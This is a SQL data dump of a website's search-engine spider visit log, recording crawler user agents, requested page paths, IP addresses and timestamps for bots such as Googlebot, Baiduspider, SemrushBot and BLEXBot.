INSERT INTO `ey_weapp_spider_visit` VALUES ('98574', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/228.html', '216.244.66.194', '1662227319', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98575', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tbxw/', '66.249.79.112', '1662228502', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98573', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/91.html', '116.179.32.77', '1662224650', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98578', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/72.html', '185.191.171.8', '1662230193', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98572', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/93.html', '220.181.108.104', '1662223247', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98571', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/95.html', '216.244.66.194', '1662223153', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98576', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/305.html', '66.249.79.110', '1662229473', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98577', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/207.html', '216.244.66.194', '1662230135', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98579', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/203.html', '66.249.79.110', '1662231547', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98592', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/99.html', '116.179.32.147', '1662240363', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98567', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/252.html', '66.249.79.108', '1662220960', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98616', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/165.html', '220.181.108.94', '1662253070', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98653', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/case/62.html', '114.119.151.155', '1662269580', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98566', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/20.html', '185.191.171.13', '1662220788', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98568', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/455.html', '185.191.171.35', '1662221897', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98547', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/177.html', '66.249.79.112', '1662212736', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98540', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/257.html', '114.119.151.153', '1662211525', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98539', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/403.html', '114.119.151.155', '1662211277', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98541', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/wuxi.html', '114.119.151.153', '1662211871', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98537', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/yfs.html', '114.119.151.153', '1662211027', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98529', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/jiaruwomen', '185.191.171.11', '1662209338', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98530', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/bljwd/', '114.119.151.155', '1662209479', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98531', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/63.html', '185.191.171.9', '1662209814', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98536', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/tags/233.html', '61.135.159.130', '1662210970', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98511', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/295.html', '116.179.32.80', '1662199403', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98512', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/365.html', '220.181.108.114', '1662200806', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98510', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/news/499.html', '58.250.125.189', '1662198449', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98509', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/bengche', '66.249.79.112', '1662198299', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98508', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/354.html', '185.191.171.33', '1662197833', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98502', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/products/279.html', '162.55.86.60', '1662197119', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98504', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/products/74.html', '162.55.86.60', '1662197182', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98505', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/products/75.html', '162.55.86.60', '1662197213', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98501', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/products/264.html', '162.55.86.60', '1662197088', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98506', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/products/77.html', '162.55.86.60', '1662197244', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98503', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/products/72.html', '162.55.86.60', '1662197150', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98499', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/list_3_68/', '162.55.86.60', '1662197026', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98500', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/list_3_7/', '162.55.86.60', '1662197057', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98498', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/list_3_67/', '162.55.86.60', '1662196995', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98497', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/list_3_66/', '162.55.86.60', '1662196964', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98495', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/list_3_6/', '162.55.86.60', '1662196902', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98507', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/products/80.html', '162.55.86.60', '1662197275', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98494', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/88.html', '162.55.86.60', '1662196871', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98542', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/jiaruwomen', '220.181.108.145', '1662212027', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98543', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/lss.html', '114.119.151.153', '1662212165', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98513', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/124.html', '185.191.171.15', '1662201538', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98545', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/case/237.html', '114.119.151.153', '1662212592', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98489', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/71.html', '66.249.79.112', '1662196731', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98488', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/485.html', '162.55.86.60', '1662196713', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98490', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/497.html', '162.55.86.60', '1662196744', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98486', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/483.html', '162.55.86.60', '1662196650', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98485', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/481.html', '162.55.86.60', '1662196619', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98482', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/477.html', '162.55.86.60', '1662196524', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98480', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/473.html', '162.55.86.60', '1662196462', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98518', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/list_3_70/', '216.244.66.194', '1662203859', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98519', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/422.html', '185.191.171.16', '1662204542', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98521', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/281.html', '116.179.32.47', '1662205012', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98478', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/31_6.html', '185.191.171.8', '1662196416', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98479', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/471.html', '162.55.86.60', '1662196430', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98473', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/465.html', '162.55.86.60', '1662196275', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98474', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/467.html', '162.55.86.60', '1662196306', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98475', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/468.html', '162.55.86.60', '1662196337', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98462', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/317.html', '162.55.86.60', '1662195994', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98467', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/428.html', '162.55.86.60', '1662196119', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98459', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/308.html', '162.55.86.60', '1662195900', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98458', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/305.html', '162.55.86.60', '1662195869', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98457', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/300.html', '162.55.86.60', '1662195838', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98453', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/294.html', '162.55.86.60', '1662195714', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98451', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/252.html', '162.55.86.60', '1662195652', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98532', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/73_3.html', '185.191.171.4', '1662209836', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98446', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/21.html', '162.55.86.60', '1662195494', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98481', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/474.html', '162.55.86.60', '1662196493', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98441', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/gjxw/', '66.249.79.112', '1662195340', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98438', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/16.html', '162.55.86.60', '1662195275', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98434', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/127.html', '162.55.86.60', '1662195151', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98439', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/17.html', '162.55.86.60', '1662195306', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98442', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/19.html', '162.55.86.60', '1662195368', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98443', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/20.html', '162.55.86.60', '1662195399', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98440', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/18.html', '162.55.86.60', '1662195337', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98437', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/15.html', '162.55.86.60', '1662195244', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98435', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/131.html', '162.55.86.60', '1662195182', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98431', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/124.html', '162.55.86.60', '1662195058', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98429', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/case/67.html', '162.55.86.60', '1662194996', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98430', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/123.html', '162.55.86.60', '1662195027', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98427', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/case/63.html', '162.55.86.60', '1662194933', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98493', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/87.html', '162.55.86.60', '1662196840', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98418', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/case/53.html', '162.55.86.60', '1662194652', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98527', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/105.0.5195.52 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.108', '1662208451', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98465', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '220.181.108.147', '1662196058', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98471', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/463.html', '162.55.86.60', '1662196213', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98472', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/464.html', '162.55.86.60', '1662196244', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98414', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/bljxw/list_18_49/', '162.55.86.60', '1662194481', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98496', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/list_3_65/', '162.55.86.60', '1662196933', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98407', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/117.html', '220.181.108.92', '1662192856', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98409', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/bcxw/list_19_6/', '162.55.86.60', '1662194323', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98410', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/bcxw/list_19_7/', '162.55.86.60', '1662194354', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98402', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/252.html', '66.249.79.108', '1662187450', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98404', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/44_8.html', '185.191.171.37', '1662188977', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98387', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/15.html', '116.179.32.38', '1662179767', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98388', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/289.html', '114.119.151.153', '1662180319', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98389', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/252.html', '66.249.79.108', '1662181251', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98413', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/bljxw/list_18_48/', '162.55.86.60', '1662194450', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98394', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/230.html', '185.191.171.2', '1662183407', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98382', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '220.181.108.103', '1662176254', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98383', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/276.html', '116.179.32.197', '1662176493', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98380', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/9_37.html', '185.191.171.8', '1662173689', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98381', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/415.html', '114.119.151.153', '1662174590', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98385', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/111.html', '185.191.171.25', '1662179037', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98386', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/case/236.html', '114.119.151.153', '1662179724', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98390', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/206.html', '185.191.171.37', '1662181627', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98460', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/310.html', '162.55.86.60', '1662195932', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98376', '99', 'mozilla/5.0 (macintosh; intel mac os x 10_15_5) applewebkit/605.1.15 (khtml, like gecko) version/13.1.1 safari/605.1.15 (applebot/0.1; +http://www.apple.com/go/applebot)', '/products/339.html', '17.121.115.181', '1662172102', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98392', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.110', '1662181773', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98393', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/132.html', '116.179.32.141', '1662183040', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98395', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/147.html', '66.249.79.112', '1662183898', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98384', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/4_11.html', '185.191.171.8', '1662177734', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98372', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '69.14.27.140', '1662171208', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98370', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/140.html', '114.119.151.153', '1662170621', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98371', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/ptq.html', '114.119.151.153', '1662170999', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98396', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/69.html', '66.249.79.112', '1662184576', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98369', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/159.html', '185.191.171.26', '1662170126', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98461', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/316.html', '162.55.86.60', '1662195963', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98366', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/hangyexinwen/list_18_27/', '66.249.79.108', '1662167881', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98364', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/1.html?tagid=1', '220.181.108.80', '1662166675', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98403', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/484.html', '66.249.79.108', '1662188152', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98411', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/bcxw/list_19_8/', '162.55.86.60', '1662194385', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98362', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/qjs.html', '114.119.151.153', '1662165102', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98360', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/smx.html', '114.119.151.155', '1662164135', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98359', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/122.html', '220.181.108.174', '1662163403', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98357', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '58.250.125.98', '1662162469', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98356', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/list_3_16/', '216.244.66.194', '1662161606', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98352', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_68/', '185.191.171.14', '1662159681', '0');
